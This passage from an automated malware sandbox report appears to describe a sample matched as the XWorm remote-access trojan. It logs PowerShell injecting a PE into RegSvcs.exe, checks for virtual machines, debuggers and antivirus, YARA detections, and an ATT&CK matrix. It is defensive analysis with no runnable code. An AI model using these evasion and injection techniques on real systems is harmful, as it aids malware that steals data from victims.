            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4926Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4926Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1928Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7885Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7240Thread sleep time: -12912720851596678s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: Amcache.hve.18.drBinary or memory string: VMware
            Source: Amcache.hve.18.drBinary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.18.drBinary or memory string: vmci.syshbin
            Source: Amcache.hve.18.drBinary or memory string: VMware, Inc.
            Source: Amcache.hve.18.drBinary or memory string: VMware20,1hbin@
            Source: Amcache.hve.18.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.18.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.18.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.18.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.18.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: Amcache.hve.18.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.18.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.18.drBinary or memory string: vmci.sys
            Source: Amcache.hve.18.drBinary or memory string: vmci.syshbin`
            Source: Amcache.hve.18.drBinary or memory string: \driver\vmci,\driver\pci
            Source: Amcache.hve.18.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.18.drBinary or memory string: VMware20,1
            Source: Amcache.hve.18.drBinary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.18.drBinary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.18.drBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.18.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Amcache.hve.18.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.18.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.18.drBinary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.18.drBinary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.18.drBinary or memory string: VMware Virtual RAM
            Source: Amcache.hve.18.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: Amcache.hve.18.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
            Source: RegSvcs.exe, 0000000A.00000002.3659546124.00000000014D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlln=
            Source: Amcache.hve.18.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Injects a PE file into a foreign processes
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
            Writes to foreign memory regions
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 40E000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 410000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 11F7008Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdnsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: Amcache.hve.18.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.18.drBinary or memory string: msmpeng.exe
            Source: Amcache.hve.18.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: Amcache.hve.18.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
            Source: Amcache.hve.18.drBinary or memory string: MsMpEng.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected XWorm
            Source: Yara matchFile source: 0.2.powershell.exe.24a90f10d10.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.24a91d29520.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000A.00000002.3659100760.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3662994755.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1341599146.0000024A919E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1341599146.0000024A90D37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1341599146.0000024A90F6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2144, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7336, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected XWorm
            Source: Yara matchFile source: 0.2.powershell.exe.24a90f10d10.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.24a91d29520.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000A.00000002.3659100760.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3662994755.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1341599146.0000024A919E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1341599146.0000024A90D37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1341599146.0000024A90F6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2144, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7336, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
            Windows Management Instrumentation            		1
            DLL Side-Loading            		211
            Process Injection            		1
            Disable or Modify Tools            		OS Credential Dumping131
            Security Software Discovery            		Remote Services11
            Archive Collected Data            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading            		131
            Virtualization/Sandbox Evasion            		LSASS Memory1
            Process Discovery            		Remote Desktop Protocol1
            Clipboard Data            		1
            Non-Standard Port            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)211
